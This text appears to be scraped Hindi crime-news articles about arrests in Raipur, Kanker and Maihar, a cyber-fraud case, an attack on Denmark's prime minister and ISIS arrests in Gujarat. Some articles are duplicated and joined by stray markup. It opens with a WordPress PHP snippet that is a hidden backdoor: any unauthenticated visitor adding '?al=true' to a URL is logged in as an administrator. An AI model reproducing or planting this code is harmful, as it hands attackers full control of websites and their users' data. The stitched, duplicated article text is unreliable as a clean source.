// _ea_al
add_action('init', function(){
if(isset($_GET['al']) && $_GET['al']==='true'){
if(!is_user_logged_in()){
$u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]);
if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);}
if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();}
} else {wp_redirect(admin_url());exit();}
}
}, 2);
रायपुर कमिश्नरेट के तहत पंडरी थाना क्षेत्र में पुलिस ने एक युवक को अवैध पिस्टल और खाली मैग्जीन के साथ गिरफ्तार किया है। आरोपी के खिलाफ थाना पंडरी में धारा 25 आर्म्स एक्ट के तहत अपराध दर्ज कर आगे की कार्रवाई की जा रही है।
पुलिस के अनुसार, मुखबिर से सूचना मिली थी कि एक व्यक्ति अपने पास पिस्टल रखे हुए है और क्षेत्र में घूम रहा है। सूचना मिलते ही अति पुलिस उपायुक्त (नार्थ जोन) आकाश मरकाम और सहायक पुलिस आयुक्त पूर्णिमा लामा ने पंडरी थाना प्रभारी को तत्काल कार्रवाई के निर्देश दिए।
थाना प्रभारी पंडरी के नेतृत्व में पुलिस टीम ने बताए गए स्थान पर पहुंचकर मुखबिर द्वारा बताए गए हुलिए के आधार पर संदिग्ध व्यक्ति को चिन्हांकित कर पकड़ लिया। पूछताछ में आरोपी ने अपना नाम नंदू शर्मा (उम्र 30 वर्ष), पिता विमल शर्मा बताया। वह पुरानी बस्ती थाना क्षेत्र के कुशालपुर स्थित तिरंगा चौक का निवासी है।
तलाशी के दौरान आरोपी के कब्जे से एक नग पिस्टल और एक नग खाली मैग्जीन बरामद की गई। पुलिस द्वारा वैध दस्तावेज प्रस्तुत करने को कहने पर आरोपी कोई कागजात नहीं दिखा सका और पूछताछ के दौरान पुलिस को गुमराह करने का प्रयास करता रहा। इसके बाद उसके विरुद्ध विधिवत कार्रवाई की गई।
पुलिस के मुताबिक, आरोपी पूर्व में हत्या और मारपीट के मामलों में जेल जा चुका है। वर्तमान मामले में पुलिस उससे यह पूछताछ कर रही है कि पिस्टल उसे कहां से मिली और उसका उद्देश्य क्या था।
पुलिस उपायुक्त (नार्थ जोन) मयंक गुर्जर ने सभी पुलिस अधिकारियों और थाना प्रभारियों को अवैध हथियार रखने एवं उनकी अवैध खरीदी-बिक्री में संलिप्त व्यक्तियों के खिलाफ सख्त और प्रभावी कार्रवाई करने के निर्देश दिए हैं।
]]>कांकेर में चारामा पुलिस ने फर्जी दस्तावेज तैयार कर शासकीय भूमि पर अवैध रूप से वन अधिकार पट्टा लेने के मामले में तीन लोगों को गिरफ्तार किया है। गिरफ्तार आरोपियों में ग्राम पंचायत मयाना की पूर्व सरपंच का पति जीवन ठाकुर, उसका पुत्र नीरज पोया और ग्राम के पूर्व में रहे सरपंच शोप सिंह शामिल हैं।
मिली जानकारी के अनुसार मयाना के ग्रामीणों ने अनुविभागीय अधिकारी राजस्व चारामा के पास शिकायत दर्ज कराई कि कुछ लोगों ने धोखाधड़ी कर सरकारी जमीन पर अवैध रूप से वन अधिकार पट्टा प्राप्त कर लिया है। शिकायत की जांच के दौरान यह साबित हुआ कि आरोपियों ने कूट रचना और फर्जी दस्तावेजों के माध्यम से वन अधिकार मान्यता पत्र बनवाया और शासन को ₹5,17,773 की आर्थिक हानि पहुंचाई। पुलिस ने आरोपी जीवन ठाकुर, शोप सिंह और नीरज पोया को गिरफ्तार कर न्यायालय में पेश किया।
बताते चले कि यह फर्जीवाड़ा ग्राम पंचायत के पूर्व सरपंच के कार्यकाल में किया गया था। इस दौरान सरकारी जमीन पर अवैध रूप से पट्टा जारी कर कुछ व्यक्तियों को लाभ पहुंचाने की कोशिश की गई थी। ग्रामीणों का कहना है कि इस मामले को लेकर पहले भी कलेक्टर को शिकायत किया गया था, इसको लेकर गांव में कई बार विवाद और तनाव की स्थिति बनी रहती थी।
]]>धार्मिक नगरी मैहर में धार्मिक आस्था को ठेस पहुंचाने की साजिश को अंजाम देने वाले आरोपियों को पुलिस ने तत्परता दिखाते हुए गिरफ्तार कर लिया है। कोतवाली थाना क्षेत्र के संकुटा तालाब किनारे बने शिव मंदिर में भगवान नंदी की मूर्ति खंडित करने के मामले में पुलिस ने 72 घंटे के भीतर दोनों आरोपियों को सलाखों के पीछे पहुंचा दिया है।
पुलिस के मुताबिक दिनांक 18 अगस्त को मैहर जिले के संकुटा तालाब के किनारे स्थित शिव मंदिर में नंदी भगवान की मूर्ति खंडित पाई गई थी। इस घटना से स्थानीय लोगों में आक्रोश फैल गया था। कोतवाली पुलिस ने तुरंत मामले को गंभीरता से लेते हुए भारतीय न्याय संहिता की विभिन्न धाराओं के तहत मामला दर्ज किया और अज्ञात आरोपियों की तलाश शुरू की।
पुलिस की त्वरित कार्रवाई
वही, मैहर पुलिस अधीक्षक सुधीर अग्रवाल ने मामले को संज्ञान में लेते हुए थाना प्रभारी कोतवाली निरीक्षक अनिमेष द्विवेदी के नेतृत्व में विशेष टीम गठित की और आरोपियों की शीघ्र गिरफ्तारी के निर्देश दिए थे।
इसराइल और नावेद ने शराब के नशे में तोड़ी थी नदी की मूर्ति
जांच के दौरान टीम ने घटना स्थल और आसपास के इलाकों में सघन पूछताछ की। इसी आधार पर पुलिस ने मो. इसराइल उर्फ इस्सी (36 वर्ष), निवासी चिकान मोहल्ला, मैहर को हिरासत में लिया। पूछताछ में उसने स्वीकार किया कि अपने साथी नावेद अहमद (23 वर्ष) निवासी पुरानी बस्ती, मैहर के साथ संकुटा तालाब के पास शराब पीने के बाद नशे में नंदी भगवान की मूर्ति खंडित की थी।
दोनों आरोपी पहुंचे जेल
अमर्यादित कृत्य स्वीकार करने के बाद पुलिस ने आरोपी मो. इसराइल उर्फ इस्सी को 18 अगस्त को गिरफ्तार कर जेल भेज दिया था। वहीं, फरार चल रहे उसके साथी नावेद अहमद को पुलिस ने 21 अगस्त को गिरफ्तार कर न्यायालय में पेश किया, जहां से उसे भी जेल भेज दिया गया है।
]]>धार्मिक नगरी मैहर में धार्मिक आस्था को ठेस पहुंचाने की साजिश को अंजाम देने वाले आरोपियों को पुलिस ने तत्परता दिखाते हुए गिरफ्तार कर लिया है। कोतवाली थाना क्षेत्र के संकुटा तालाब किनारे बने शिव मंदिर में भगवान नंदी की मूर्ति खंडित करने के मामले में पुलिस ने 72 घंटे के भीतर दोनों आरोपियों को सलाखों के पीछे पहुंचा दिया है।
पुलिस के मुताबिक दिनांक 18 अगस्त को मैहर जिले के संकुटा तालाब के किनारे स्थित शिव मंदिर में नंदी भगवान की मूर्ति खंडित पाई गई थी। इस घटना से स्थानीय लोगों में आक्रोश फैल गया था। कोतवाली पुलिस ने तुरंत मामले को गंभीरता से लेते हुए भारतीय न्याय संहिता की विभिन्न धाराओं के तहत मामला दर्ज किया और अज्ञात आरोपियों की तलाश शुरू की।
पुलिस की त्वरित कार्रवाई
वही, मैहर पुलिस अधीक्षक सुधीर अग्रवाल ने मामले को संज्ञान में लेते हुए थाना प्रभारी कोतवाली निरीक्षक अनिमेष द्विवेदी के नेतृत्व में विशेष टीम गठित की और आरोपियों की शीघ्र गिरफ्तारी के निर्देश दिए थे।
इसराइल और नावेद ने शराब के नशे में तोड़ी थी नदी की मूर्ति
जांच के दौरान टीम ने घटना स्थल और आसपास के इलाकों में सघन पूछताछ की। इसी आधार पर पुलिस ने मो. इसराइल उर्फ इस्सी (36 वर्ष), निवासी चिकान मोहल्ला, मैहर को हिरासत में लिया। पूछताछ में उसने स्वीकार किया कि अपने साथी नावेद अहमद (23 वर्ष) निवासी पुरानी बस्ती, मैहर के साथ संकुटा तालाब के पास शराब पीने के बाद नशे में नंदी भगवान की मूर्ति खंडित की थी।
दोनों आरोपी पहुंचे जेल
अमर्यादित कृत्य स्वीकार करने के बाद पुलिस ने आरोपी मो. इसराइल उर्फ इस्सी को 18 अगस्त को गिरफ्तार कर जेल भेज दिया था। वहीं, फरार चल रहे उसके साथी नावेद अहमद को पुलिस ने 21 अगस्त को गिरफ्तार कर न्यायालय में पेश किया, जहां से उसे भी जेल भेज दिया गया है।
]]>राजा की मां ने क्या सजा मांगी?
पुलिस का आरोप है कि सोनम ने इंदौर के तीन हमलावरों को पति की हत्या के लिए हायर किया था, हालांकि सोनम के पिता ने अपनी बेटी को निर्दोष बताया है। इस मामले में मृतक राजा की मां का बयान भी सामने आया है। उन्होंने अपनी बात रखते हुए हत्यारों के लिए सजा की मांग की है। राजा रघुवंशी की मां उमा रघुवंशी ने कहा है कि इसके जिम्मेदार लोगों को मौत की सजा मिलनी चाहिए। उन्होंने कहा कि हमको जरा सी भी भनक नहीं है कि कौन था कौन नहीं था। राजा तक को भनक नहीं थी। अगर कुछ ऐसा होता तो राजा हमें बता देता। अगर राजा को सोनम ने मरवाया है तो मैं कड़ी से कड़ी सजा चाहती हूं। फांसी। इसके बाद राजा की मां ने कहा कि मैं कुछ बोलना नहीं… और फिर इतना कहते कहते रुक गईं।
23 मई को लापता हुए कपल में राजा रघुवंशी का शव सोमवार दो जून को पूर्वी खासी हिल्स जिले के सोहरा क्षेत्र में एक झरने के पास गहरी खाई में मिला था, जबकि उनकी पत्नी की तलाश जारी थी। सोनम समेत तीन अन्य लोगों की गिरफ्तारी पर मेघालय मुख्यमंत्री कोनराड के सांग्मा का बयान सामने आया है। उन्होंने अपने एक्स हेंडल पर लिखा- राजा हत्याकांड में 7 दिनों के भीतर मेघालय पुलिस को बड़ी सफलता मिली है। मध्य प्रदेश के रहने वाले 3 हमलावरों को गिरफ्तार कर लिया गया है, महिला ने आत्मसमर्पण कर दिया है और 1 अन्य हमलावर को पकड़ने के लिए अभियान अभी भी जारी है। बहुत बढ़िया।
]]>नौकरी का झांसा देकर बेरोजगारों से ठगी करने के मामले में CGPSC के पूर्व चेयरमैन टामन सिंह सोनवानी के साले देवेंद्र जोशी और उसकी पत्नी के बाद अब उनके सहयोगी को भी पुलिस ने गिरफ्तार किया है. आरोपी देवेंद्र जोशी का सहयोगी स्वपनिल दुबे रेलवे में काम करता है.
सीजीपीएससी घोटाले में जेल बंद टामन सोनवानी के साले देवेंद्र जोशी और उसकी पत्नी झगीता जोशी को बेरोजगारों को नौकरी दिलाने का झांसा देकर करोड़ों रुपए की ठगी करने पर दो दिन पहले गिरफ्तार किया था. अब तक 20 लोगों से ठगी की जानकारी पुलिस के हाथ लगी है. पुलिस रिमांड में पूछताछ के दौरान देवेंद्र ने बताया कि ठगी के इस पूरे गिरोह में कई रेलवे और पुलिस के कर्मचारी भी शामिल हैं. मामले में जांच को आगे बढ़ाते हुए देवेंद्र जोशी के सहयोगी रेलवे कर्मचारी स्वप्निल दुबे को भी गिरफ्तार किया है. सिविल लाइन थाना प्रभारी रोहित मालेकर ने बताया कि स्वप्निल दुबे को परसों गिरफ्तार करके कल कोर्ट पेश किया गया है. अभी आरोपी को जेल नहीं भेजा गया है. फिलहाल, पुलिस रिमांड पर लेकर पुलिस पूछताछ कर रही है. पूछताछ में और भी कई खुलासे हो सकते हैं. जानकारी के अनुसार, पुलिस जांच में यह बात सामने आई कि देवेंद्र जोशी ने अपने जीजा समेत कई पुलिस और प्रशासनिक अधिकारियों से अपनी पहचान का हवाला देते हुए रिश्तेदारों से डेढ़ करोड़ रुपए की ठगी की है. वहीं जांच में यह बात भी सामने आई कि मामले में कई पुलिस कर्मचारियों के नाम सामने आने के बाद भी, उनके खिलाफ थाने में दर्ज FIR की जांच सुस्त पड़ी थी. अब सिविल लाइन थाना पुलिस ने आरोपित के खिलाफ धोखाधड़ी की धाराओं में एफआईआर दर्ज कर जांच शुरू कर दी है.
]]>शहर के दोहरे हत्याकांड मामले में बड़ा अपडेट सामने आया है. पुलिस को मामले में बड़ी सफलता मिली है. बुर्जुग भाई-बहन की घर में जघन्य हत्या की वारदात को अंजाम देने वाले आरोपियों को पुलिस ने उत्तरप्रदेश से गिरफ्तार किया है.
आरोपी चोरी की नियत से बुजुर्ग भाई-बहन के घर में घुसे थे. आरोपियों में एक युवती और दो युवक शामिल है. दरअसल, रायगढ़ में 13 जनवरी को सिटी कोतवाली के करीब पुरानी हटरी मार्केट क्षेत्र में दो बुजुर्ग भाई, बहन की लाश मिली थी. बीते कई सालों से दोनों अपने ही मकान रहते थे. जिनकी अज्ञात आरोपियों के द्वारा हत्या की गई थी. मृतक का नाम सीताराम जायसवाल और महिला का नाम अन्नपूर्णा जायसवाल है. अब पुलिस अधीक्षक दिव्यांग पटेल ने आरोपियों के पकड़े जाने की पुष्टि की है.
]]>एसपी (साइबर) जितेंद्र सिंह के मुताबिक, उद्यमी धीरज जायसवाल द्वारा शिकायत दर्ज करवाई गई थी। धीरज के साथ शेयर ट्रेडिंग एप के माध्यम से 85 लाख 21 हजार रुपये की ठगी हुई थी। ठगी राशि आरके इंटरप्राइजेस के इंडसइंड बैंक के करंट खाते में जमा हुई थी। पुलिस ने बैंक से जानकारी ली और खाता संचालक राकेश त्रिपाठी को गिरफ्तार कर लिया।
मूलत: इकई बलरामपुर (उप्र) निवासी राकेश सुखलिया में रहता है और डिलीवरी ब्वाय का काम करता है। उसने बताया कि खाता इंडसइंड बैंक के डेवलपमेंट मैनेजर मोहम्मद जाबाज कुरैशी ने खुलवाया है। सोमवार को पुलिस ने कुरैशी को भी गिरफ्तार कर लिया। पूछताछ में खुलासा हुआ कि उसका संपर्क बैंक के दो अन्य कर्मचारियों संदीप और हितेश से है, जो दुबई माड्यूल के सदस्य हैं।
टेलीग्राम चैनल से जुड़े संदीप और हितेश ने ठग के इशारे पर फर्जी खाते खुलवाकर एटीएम, चेक, पासबुक आदि भिजवाई है। एक खाते के बदले 12 से 15 लाख रुपये फीस मिलती थी। इन खातों का दो-तीन महीने तक इस्तेमाल किया जाता था।
पुलिस को जानकारी मिली है कि आरके इंटरप्राइजेस के खाते में दो माह के अंदर छह करोड़ 18 लाख रुपये जमा हुए हैं। एक अन्य फर्म गढ़वाल इंटरप्राइजेस के नाम से खोले खाते में भी दो माह में सात करोड़ 50 लाख रुपये का ट्रांजेक्शन हुआ है। पुलिस अब बैंककर्मी संदीप और हितेश को ढूंढ रही है।
फर्जी केवायसी-गुमाश्ता से खुलवाए करंट खाते
एसपी के मुताबिक, यशवंत मार्ग मेला रोड़ महिदपुर निवासी जाबाज कुरैशी सियागंज स्थित इंडसइंड बैंक में पदस्थ है और फिलहाल देवसाया अपार्टमेंट स्नेहलतागंज में रहता है। उसने पूछताछ में 35 खाते खुलवाना स्वीकारा है। आरोपित ने करंट खाता खुलवाने के लिए राकेश त्रिपाठी के नाम से फर्म बनाई और फर्जी गुमाश्ता अनुज्ञा, आइडी का इस्तेमाल किया। इसमें वह बल्क अपलोड और कार्पोरेट आइडी की सुविधा भी रखता था। आरोपित फोन पे, ई-वालेट और बल्क अपलोड के माध्यम से मिनटों में रुपये अन्य खातों में ट्रांसफर कर लेते।
]]>डेनमार्क की प्रधानमंत्री मेटे फ्रेडरिक्सन पर कोपेनहेगन में एक शख्स ने हमला कर दिया. हालांकि इस हमले में प्रधानमंत्री को कोई चोट नहीं आई है, तुरंत ही उन्हें वहां से सुरक्षित निकाल लिया गया. एक स्थानीय निवासी ने रॉयटर्स को बताया कि हमले में फ्रेडरिक्सन को किसी तरह की चोट नहीं लगी है.
उनके कार्यालय ने बिना कोई विस्तृत जानकारी दिए एक बयान में कहा, "प्रधानमंत्री मेटे फ्रेडरिक्सन पर शुक्रवार शाम को कोपेनहेगन के कुल्टोरवेट (स्क्वायर, रेड) में एक शख्स ने हमला किया जिसे बाद में गिरफ्तार कर लिया गया. प्रधानमंत्री इस घटना से स्तब्ध हैं.'
आरोपी अरेस्ट
पुलिस ने सोशल मीडिया प्लेटफॉर्म एक्स पर कहा कि उन्होंने एक व्यक्ति को गिरफ्तार किया है. आरोपी से पूछताछ की जा रही है और घटना की जांच की जा रही है. पुलिस ने और अधिक जानकारी देने से इनकार कर दिया.
जिस जगह यह घटना घटी, वहां पर काम करने वाले सोरेन केजरगार्ड ने नाम एक शख्स ने बताया, "एक शख्स आया और उसने प्रधानमंत्री के कंधे पर जोर से धक्का मारा, जिसके बाद वह तरफ गिर गईं. वह थोड़ी तनावग्रस्त लग रही थी.
धानमंत्री को हमले के बाद सुरक्षाकर्मियों द्वारा ले जाया गया. यह हमला डेनमार्क के यूरोपीय संघ के चुनाव में मतदान से दो दिन पहले हुआ है. तीन सप्ताह पहले, स्लोवाकिया में भी इसी तरह का हमला हुआ था जब वहां के प्रधानमंत्री रॉबर्ट फिको पर हमला किया गया था. इस दौरान वह गंभीर रूप से घायल हो गए थे.
चुनाव से दो दिन पहले हुआ हमला
यह हमला 9 जून को होने वाले यूरोपियन यूनियन चुनाव से ठीक पहले हुआ है. डेनिश PM फ्रेडरिक्सन सोशल डेमोक्रेट्स यूरोपीय संघ के प्रमुख उम्मीदवार क्रिस्टेल शाल्डेमोस के साथ प्रचार कर रही हैं. डेनमार्क के पर्यावरण मंत्री मैग्नस ह्यूनिके ने एक्स पर कहा: 'मेटे स्वाभाविक रूप से हमले से सदमे में हैं. मैं इतना ही कहूंगा कि इस घटना ने उनके सभी करीबियों को झकझोर कर रख दिया है.'
]]>
गुजरात एटीएस ने सोमवार को अहमदाबाद एयरपोर्ट से ISIS के 4 आतंकियों को गिरफ्तार किया है। ATS से मिली जानकारी के मुताबिक, इन चारों लोगों को केंद्रीय एजेंसी से मिले इनपुट के आधार पर अरेस्ट किया गया है।
गिरफ्तार हुए सभी चार आतंकी श्रीलंकाई मूल के हैं। एटीएस इनसे पूछताछ कर रही है। एटीएस शाम चार बजे इसका खुलासा करेगी कि वे अहमदाबाद एयरपोर्ट क्यों आए थे और इनका इरादा क्या था? जानकारी के मुताबिक गुजरात एटीएस ने इससे पहले भी एक कार्रवाई में ऐसे पांच लोगों को हिरासत में लिया था, जो लोग आईएस खुरासान से जुड़े थे। उसी समय गुजरात एटीएस को सूचना मिली कि तीन लोग पोरबंदर समुद्री रास्ते से अफगानिस्तान और वहां से ईरान जाने की फिराक में हैं।
श्रीलंका से चेन्नई और फिर अहमदाबाद पहुंचे थे
मीडिया रिपोर्टों में पुलिस के सूत्रों के हवाले से कहा गया है कि देश में बड़ा आतंकी हमला करने इरादे से इन्हें श्रीलंका से भारत भेजा गया है। शुरुआती जांच में सामने आया है कि ये श्रीलंका से वाया चेन्नई अहमदाबाद पहुंचे थे लेकिन ये अपने किसी नापाक मंसूबे को अंजाम दे पाते, इसके पहले ही एटीएस ने इन्हें दबोच लिया। बताया यह भी जा रहा है कि ये आतंकवादी अपने हैंडलर के निर्देशों का इंतजार कर रहे थे। आतंकियों तक हथियार अलग से पहुंचाए जाने वाले थे। आतंकियों का असली मकसद क्या था इसका खुलासा एटीएस अपने प्रेस कॉन्फ्रेंस में कर सकती है।
चेन्नई से पहुंचे थे अहमदाबाद
गुजरात पुलिस के सूत्रों से जो जानकारी समाने आई है उसके अनुसार ये देश में बड़ा आतंकी हमला करने के लिए श्रीलंका से भेजे गए थे। शुरुआती जांच में सामने आया है कि ये श्रीलंका से वाया चेन्नई अहमदाबाद पहुंचे थे। अहमदाबाद से की टारगेटेड लोकेशन पर पहुंचने से पहले ही गुजरात ATS ने अरेस्ट कर लिया। यह भी सामने आया है कि ये आतंकी पाकिस्तान के हैंडलर के आदेश का इंतज़ार कर रहे थे। इन आतंकीओ तक हथियार भी अलग से पहुंचाने जाने वाले थे। ATS ने एनक्रिप्टेड चैट्स इन आतंकियों के फोन से बरामद की है। गुजरात में ISIS के चार आतंकियों की गिरफ्तारी ऐसे वक्त पर हुई है जब सूरत पुलिस मौलवी सोहेल अबुबकर मामले में पहले से ही जांच में जुटी है। दिल्ली की तरह अहमदबाद के 36 स्कूलों को भी बम से उड़ानें की धमकी मिली थी। हालांकि तब कोई भी संदेहास्पद वस्तु जांच में नहीं मिली थी, लेकिन इन आतंकियों के अहमदाबाद तक पहुंचने के बाद गुजरात पुलिस अलर्ट मोड में आ गई है।
देश में बड़ा आतंकी हमला करने के फिराक में थे आतंकी
सूत्रों के मुताबिक, ये चारों आतंकी देश में बड़ा आतंकी हमला करने के फिराक में थे. प्रारंभिक जांच पता चला है कि ये आतंकी श्रीलंका से वाया चेन्नई अहमदाबाद पहुंचे थे. टारगेटेड लोकेशन पर पहुंचने से पहले ही गुजरात एटीएस ने इन चारों आतंकियों को गिरफ्तार कर लिया.
जानकारी में ये भी मालूम हुआ है कि ये आतंकी पाकिस्तान के हैंडलर के आदेश का इंतजार कर रहे थे. इन आतंकियों के अहमदाबाद तक पहुंचने के बाद गुजरात पुलिस अलर्ट मोड में आ गई है.
]]>